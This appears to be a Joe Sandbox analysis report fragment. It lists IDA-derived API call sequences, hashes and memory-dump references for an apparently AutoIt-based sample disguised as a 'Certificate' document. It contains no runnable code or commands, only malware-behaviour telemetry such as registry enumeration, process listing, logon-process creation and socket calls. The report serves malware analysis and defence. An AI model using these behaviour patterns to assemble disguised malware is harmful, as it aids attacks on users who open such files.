                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: 7bb34c681f11d80215bcef299ec80d0fb174e76fb836e10a7114368b49baade4
                                                                              • Instruction ID: f9434ae0bd46b152f34b6761cf3f330250601e5f245df9d6523d6457516a11f2
                                                                              • Opcode Fuzzy Hash: 7bb34c681f11d80215bcef299ec80d0fb174e76fb836e10a7114368b49baade4
                                                                              • Instruction Fuzzy Hash: 1421977660121DAF9B10DF78DC88DBB73ACFB09360B008525FA15DB352E6B4EC4587A4
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              • Opcode ID: 497142e72ecf4d623cf04c5d0c2199d7532eb1392444f8038e8ba001370f87ae
                                                                              • Instruction ID: f2a779c0ba6e531101d1d64239ff85c896cd824ab7e3e769c257fc34faf4aaa7
                                                                              • Opcode Fuzzy Hash: 497142e72ecf4d623cf04c5d0c2199d7532eb1392444f8038e8ba001370f87ae
                                                                              • Instruction Fuzzy Hash: 3F217C31204659B7D321A6349C16FBB73A8EF64310F60402AF645D7383E69D9D53C3A5
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F09CB
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F09F1
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 007F09F4
                                                                              • SysAllocString.OLEAUT32 ref: 007F0A15
                                                                              • SysFreeString.OLEAUT32 ref: 007F0A1E
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 007F0A38
                                                                              • SysAllocString.OLEAUT32(?), ref: 007F0A46
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: 424ebd61312550e42895f3b6102b4c05e0bb0824be267df0df3ea9d6067fa27b
                                                                              • Instruction ID: e4dec2aa177d7b02fc04ba91da2f88ec7590295a79658bb57334d9c282378565
                                                                              • Opcode Fuzzy Hash: 424ebd61312550e42895f3b6102b4c05e0bb0824be267df0df3ea9d6067fa27b
                                                                              • Instruction Fuzzy Hash: AA213275604208AF9B10DBB8DC89DBAB7EDFF49360740C525FA49CB361E674EC418764
                                                                              APIs
                                                                                • Part of subcall function 007CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                                                • Part of subcall function 007CD17C: GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                                                • Part of subcall function 007CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0081A32D
                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0081A33A
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0081A345
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0081A354
                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0081A360
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 1025951953-3636473452
                                                                              • Opcode ID: aacc051cfd9bf14a762d8e884640decbb29a7f49b594d8aa6aeb3137474e4679
                                                                              • Instruction ID: db2d8fda5c6e3b958bd01e54916d18ca57e83c5b282e092e644e66f305935a91
                                                                              • Opcode Fuzzy Hash: aacc051cfd9bf14a762d8e884640decbb29a7f49b594d8aa6aeb3137474e4679
                                                                              • Instruction Fuzzy Hash: 06118BB1150219BEEF159FA4CC86EEB7F6DFF08798F014114BA18A61A0C6729C61DBA4
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 007CCCF6
                                                                              • GetWindowRect.USER32(?,?), ref: 007CCD37
                                                                              • ScreenToClient.USER32(?,?), ref: 007CCD5F
                                                                              • GetClientRect.USER32(?,?), ref: 007CCE8C
                                                                              • GetWindowRect.USER32(?,?), ref: 007CCEA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Client$Window$Screen
                                                                              • String ID:
                                                                              • API String ID: 1296646539-0
                                                                              • Opcode ID: ced7936d8f3f0053f04995076f76ec5b78f49e0e2738d48ba628b0b7005a1219
                                                                              • Instruction ID: 890cfa5fe8fc9783a79e8819f4d90aab66d12fb68c4cefe213c83491ceb1dd6d
                                                                              • Opcode Fuzzy Hash: ced7936d8f3f0053f04995076f76ec5b78f49e0e2738d48ba628b0b7005a1219
                                                                              • Instruction Fuzzy Hash: 69B12779A00649DBDB11CFA8C580BEEBBB1FF08310F14956DEC59EB250DB34A951CB68
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00811C18
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00811C26
                                                                              • __wsplitpath.LIBCMT ref: 00811C54
                                                                                • Part of subcall function 007D1DFC: __wsplitpath_helper.LIBCMT ref: 007D1E3C
                                                                              • _wcscat.LIBCMT ref: 00811C69
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00811CDF
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00811CF1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 1380811348-0
                                                                              • Opcode ID: 43c6cc29c3cdc0e9d4fa62b121ad61f51c0e4411722025cc77552b2503cff29c
                                                                              • Instruction ID: 79b17684af25904c5f2ce81d8672ad15e5e90c224f3fca175df19cfe374353b6
                                                                              • Opcode Fuzzy Hash: 43c6cc29c3cdc0e9d4fa62b121ad61f51c0e4411722025cc77552b2503cff29c
                                                                              • Instruction Fuzzy Hash: A7514BB11043409BD720DF64D889FABB7ECFF88754F00492EF68AD7251EB7499448B92
                                                                              APIs
                                                                                • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008130AF
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008130EF
                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00813112
                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0081313B
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0081317E
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0081318B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                              • String ID:
                                                                              • API String ID: 3451389628-0
                                                                              • Opcode ID: 97cf12abf5fc113552272dad4f18c225dde395c03b7ce32fb3f4cdc146d6199b
                                                                              • Instruction ID: 15f3cd6453f9587a5635bead736e650a54ea65ad78d0c7d6a3315f9c8a9de419
                                                                              • Opcode Fuzzy Hash: 97cf12abf5fc113552272dad4f18c225dde395c03b7ce32fb3f4cdc146d6199b
                                                                              • Instruction Fuzzy Hash: 19514531208304EFC705EF64C899EAABBE9FF88304F04895DF595872A1DB35EA45CB52
                                                                              APIs
                                                                              • GetMenu.USER32(?), ref: 00818540
                                                                              • GetMenuItemCount.USER32(00000000), ref: 00818577
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0081859F
                                                                              • GetMenuItemID.USER32(?,?), ref: 0081860E
                                                                              • GetSubMenu.USER32(?,?), ref: 0081861C
                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0081866D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                              • String ID:
                                                                              • API String ID: 650687236-0
                                                                              • Opcode ID: 4f5d234aa311c79cd4911d19a9c279cd0ee92f8770e02c767a8a9c6b71617b24
                                                                              • Instruction ID: 32b286db01eaf0a8cd518b8591ec3800f8efbea70ec56ed585eb1ce80ce1d481
                                                                              • Opcode Fuzzy Hash: 4f5d234aa311c79cd4911d19a9c279cd0ee92f8770e02c767a8a9c6b71617b24
                                                                              • Instruction Fuzzy Hash: 48517831A00218EFCB11EF64C84AAEEB7F9FF58310F104499E915EB351DB34AE818B90
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F4B10
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F4B5B
                                                                              • IsMenu.USER32(00000000), ref: 007F4B7B
                                                                              • CreatePopupMenu.USER32 ref: 007F4BAF
                                                                              • GetMenuItemCount.USER32(000000FF), ref: 007F4C0D
                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007F4C3E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              • String ID:
                                                                              • API String ID: 3311875123-0
                                                                              • Opcode ID: efa4d90981663a61f75330bb228ab46af23a4ee813af2dfaad0f3da93ab5795b
                                                                              • Instruction ID: 0e33531f7a84e0bf52e0ef8595f5310fe26cd806d73b6621e0f7fa96a1be596b
                                                                              • Opcode Fuzzy Hash: efa4d90981663a61f75330bb228ab46af23a4ee813af2dfaad0f3da93ab5795b
                                                                              • Instruction Fuzzy Hash: AA51ADB060130DEBDF20CF68D988BBEBBF4AF44318F144159E6659A391E7789944CB61
                                                                              APIs
                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0084DC00), ref: 00808E7C
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808E89
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00808EAD
                                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00808EC5
                                                                              • _strlen.LIBCMT ref: 00808EF7
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808F6A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_strlenselect
                                                                              • String ID:
                                                                              • API String ID: 2217125717-0
                                                                              • Opcode ID: eed0109317b7a2279af2816079303197bcc50912baebc44b051d7d566024aa08
                                                                              • Instruction ID: 7668582b6fa48a52ec19bf55f7885e992eaf1fbb1ef75bd81a5c604b5d7567e5
                                                                              • Opcode Fuzzy Hash: eed0109317b7a2279af2816079303197bcc50912baebc44b051d7d566024aa08
                                                                              • Instruction Fuzzy Hash: F4417C71500208EBCB54EBA4CD8AEEEB7B9FB48314F104559F556D72D1DF34AE40CA60
APIs
  • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
• BeginPaint.USER32(?,?,?), ref: 007CAC2A
• GetWindowRect.USER32(?,?), ref: 007CAC8E
• ScreenToClient.USER32(?,?), ref: 007CACAB
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007CACBC
• EndPaint.USER32(?,?,?,?,?), ref: 007CAD06
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0082E673
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
• String ID:
• API String ID: 2592858361-0
APIs
• ShowWindow.USER32(00871628,00000000,00871628,00000000,00000000,00871628,?,0082DC5D,00000000,?,00000000,00000000,00000000,?,0082DAD1,00000004), ref: 0081E40B
• EnableWindow.USER32(00000000,00000000), ref: 0081E42F
• ShowWindow.USER32(00871628,00000000), ref: 0081E48F
• ShowWindow.USER32(00000000,00000004), ref: 0081E4A1
• EnableWindow.USER32(00000000,00000001), ref: 0081E4C5
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0081E4E8
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 007F98D1
  • Part of subcall function 007CF4EA: std::exception::exception.LIBCMT ref: 007CF51E
  • Part of subcall function 007CF4EA: __CxxThrowException@8.LIBCMT ref: 007CF533
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007F9908
• EnterCriticalSection.KERNEL32(?), ref: 007F9924
• LeaveCriticalSection.KERNEL32(?), ref: 007F999E
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007F99B3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 007F99D2
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 2537439066-0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,008077F4,?,?,00000000,00000001), ref: 00809B53
  • Part of subcall function 00806544: GetWindowRect.USER32(?,?), ref: 00806557
• GetDesktopWindow.USER32 ref: 00809B7D
• GetWindowRect.USER32(00000000), ref: 00809B84
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00809BB6
  • Part of subcall function 007F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
• GetCursorPos.USER32(?), ref: 00809BE2
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00809C44
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007EAFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 007EAFB5
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007EAFC4
• CloseHandle.KERNEL32(00000004), ref: 007EAFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007EAFFE
• DestroyEnvironmentBlock.USERENV(00000000), ref: 007EB012
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
APIs
  • Part of subcall function 007CAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 007CAFE3
  • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CAFF2
  • Part of subcall function 007CAF83: BeginPath.GDI32(?), ref: 007CB009
  • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CB033
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0081EC20
• LineTo.GDI32(00000000,00000003,?), ref: 0081EC34
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0081EC42
• LineTo.GDI32(00000000,00000000,?), ref: 0081EC52
• EndPath.GDI32(00000000), ref: 0081EC62
• StrokePath.GDI32(00000000), ref: 0081EC72
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
APIs
• GetDC.USER32(00000000), ref: 007EE1C0
• GetDeviceCaps.GDI32(00000000,00000058), ref: 007EE1D1
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 007EE1D8
• ReleaseDC.USER32(00000000,00000000), ref: 007EE1E0
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 007EE1F7
• MulDiv.KERNEL32(000009EC,?,?), ref: 007EE209
  • Part of subcall function 007E9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,007E9A05,00000000,00000000,?,007E9DDB), ref: 007EA53A
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• String ID:
• API String ID: 603618608-0
APIs
• __init_pointers.LIBCMT ref: 007D7B47
  • Part of subcall function 007D123A: __initp_misc_winsig.LIBCMT ref: 007D125E
  • Part of subcall function 007D123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 007D7F51
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007D7F65
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007D7F78
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007D7F8B
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007D7F9E
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 007D7FB1
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 007D7FC4
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 007D7FD7
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 007D7FEA
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 007D7FFD
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 007D8010
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 007D8023
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 007D8036
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 007D8049
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 007D805C
  • Part of subcall function 007D123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 007D806F
• __mtinitlocks.LIBCMT ref: 007D7B4C
  • Part of subcall function 007D7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0086AC68,00000FA0,?,?,007D7B51,007D5E77,00866C70,00000014), ref: 007D7E41
• __mtterm.LIBCMT ref: 007D7B55
  • Part of subcall function 007D7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,007D7B5A,007D5E77,00866C70,00000014), ref: 007D7D3F
  • Part of subcall function 007D7BBD: _free.LIBCMT ref: 007D7D46
  • Part of subcall function 007D7BBD: DeleteCriticalSection.KERNEL32(0086AC68,?,?,007D7B5A,007D5E77,00866C70,00000014), ref: 007D7D68
• __calloc_crt.LIBCMT ref: 007D7B7A
• GetCurrentThreadId.KERNEL32 ref: 007D7BA3
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
• String ID:
• API String ID: 2942034483-0
                                                                              • Opcode ID: 0a66673b31c088eecbad44102e94ee6e16734b6118da2d165a35b87085aa4111
                                                                              • Instruction ID: 15e6f540a46ca7a395b51e27b2ce138dfa8d7b04ddddf89c18a4894b3f3672fd
                                                                              • Opcode Fuzzy Hash: 0a66673b31c088eecbad44102e94ee6e16734b6118da2d165a35b87085aa4111
                                                                              • Instruction Fuzzy Hash: 34F096B210D31299E62C77347D0B64A2BB5AF01730B6046ABF860D53D2FF2D9841C564
                                                                              APIs
                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007B281D
                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 007B2825
                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007B2830
                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007B283B
                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 007B2843
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 007B284B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
